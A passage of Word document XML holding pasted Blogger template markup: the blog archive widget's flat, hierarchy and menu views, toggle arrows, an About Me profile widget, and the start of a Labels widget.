        <w:t xml:space="preserve">            &lt;b:include cond='data:style == &amp;quot;HIERARCHY&amp;quot;' data='data' name='interval'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:include cond='data:style == &amp;quot;FLAT&amp;quot;' data='data' name='flat'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:include cond='data:style == &amp;quot;MENU&amp;quot;' data='data' name='menu'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:includable id='flat' var='data'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;ul class='flat'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:loop values='data:data' var='i'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;li class='archivedate'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;a expr:href='data:i.url'&gt;&lt;data:i.name/&gt;&lt;/a&gt; (&lt;data:i.post-count/&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:includable id='interval' var='intervalData'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:loop values='data:intervalData' var='interval'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;ul class='hierarchy'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;li expr:class='&amp;quot;archivedate &amp;quot; + data:interval.expclass'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:include cond='data:interval.toggleId' data='interval' name='toggle'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;a class='post-count-link' expr:href='data:interval.url'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">              &lt;data:interval.name/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;span class='post-count' dir='ltr'&gt;(&lt;data:interval.post-count/&gt;)&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:include cond='data:interval.data' data='interval.data' name='interval'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:include cond='data:interval.posts' data='interval.posts' name='posts'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:includable id='menu' var='data'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;select expr:id='data:widget.instanceId + &amp;quot;_ArchiveMenu&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;option value=''&gt;&lt;data:title/&gt;&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:loop values='data:data' var='i'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;option expr:value='data:i.url'&gt;&lt;data:i.name/&gt; (&lt;data:i.post-count/&gt;)&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/select&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:includable id='posts' var='posts'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;ul class='posts'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:loop values='data:posts' var='post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;li&gt;&lt;a expr:href='data:post.url'&gt;&lt;data:post.title/&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:includable id='toggle' var='interval'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;a class='toggle' href='javascript:void(0)'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;span expr:class='&amp;quot;zippy&amp;quot; + (data:interval.expclass == &amp;quot;expanded&amp;quot; ? &amp;quot; toggle-open&amp;quot; : &amp;quot;&amp;quot;)'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          &lt;b:if cond='data:interval.expclass == &amp;quot;expanded&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &amp;#9660;&amp;#160;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:elseif cond='data:blog.languageDirection == &amp;quot;rtl&amp;quot;'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &amp;#9668;&amp;#160;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &amp;#9658;&amp;#160;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;/b:section-contents&gt;&lt;b:section-contents id='footer-2-2'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;b:widget id='Profile2' locked='false' title='About Me' type='Profile' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='showaboutme'&gt;true&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='showlocation'&gt;false&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:if cond='data:title != &amp;quot;&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;h2&gt;&lt;data:title/&gt;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;div class='widget-content'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:if cond='data:team'&gt; &lt;!-- team blog profile --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:loop values='data:authors' var='i'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;li&gt;&lt;a class='profile-name-link g-profile' expr:href='data:i.userUrl' expr:style='&amp;quot;background-image: url(&amp;quot; + data:i.profileLogo + &amp;quot;);&amp;quot;'&gt;&lt;data:i.display-name/&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:else/&gt; &lt;!-- normal blog profile --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;b:if cond='data:photo.url != &amp;quot;&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;a expr:href='data:userUrl'&gt;&lt;img class='profile-img' expr:alt='data:messages.myPhoto' expr:height='data:photo.height' expr:src='data:photo.url' expr:width='data:photo.width'/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;dl class='profile-datablock'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;dt class='profile-data'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;a class='profile-name-link g-profile' expr:href='data:userUrl' expr:style='&amp;quot;background-image: url(&amp;quot; + data:profileLogo + &amp;quot;);&amp;quot;' rel='author'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;data:displayname/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;b:if cond='data:hasgoogleprofile'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;br/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;div class='g-follow' data-annotation='bubble' data-height='20' expr:data-href='data:userUrl'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/dt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:if cond='data:showlocation'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;dd class='profile-data'&gt;&lt;data:location/&gt;&lt;/dd&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:if cond='data:aboutme != &amp;quot;&amp;quot;'&gt;&lt;dd class='profile-textblock'&gt;&lt;data:aboutme/&gt;&lt;/dd&gt;&lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          &lt;/dl&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;a class='profile-link' expr:href='data:userUrl' rel='author'&gt;&lt;data:viewProfileMsg/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:include name='quickedit'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;/b:widget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>&lt;/b:section-contents&gt;&lt;b:section-contents id='footer-2-3'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">  &lt;b:widget id='Label2' locked='false' title='Labels' type='Label' version='1'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='sorting'&gt;ALPHA&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='display'&gt;LIST&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='selectedLabelsList'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='showType'&gt;ALL&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:widget-setting name='showFreqNumbers'&gt;false&lt;/b:widget-setting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:widget-settings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:includable id='main'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;b:if cond='data:title != &amp;quot;&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;h2&gt;&lt;data:title/&gt;&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;div expr:class='&amp;quot;widget-content &amp;quot; + data:display + &amp;quot;-label-widget-content&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        &lt;b:if cond='data:display == &amp;quot;list&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;b:loop values='data:labels' var='label'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;b:if cond='data:blog.url == data:label.url'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                  &lt;span expr:dir='data:blog.languageDirection'&gt;&lt;data:label.name/&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;a expr:dir='data:blog.languageDirection' expr:href='data:label.url'&gt;&lt;data:label.name/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;b:if cond='data:showFreqNumbers'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  &lt;span dir='ltr'&gt;(&lt;data:label.count/&gt;)&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              &lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          &lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
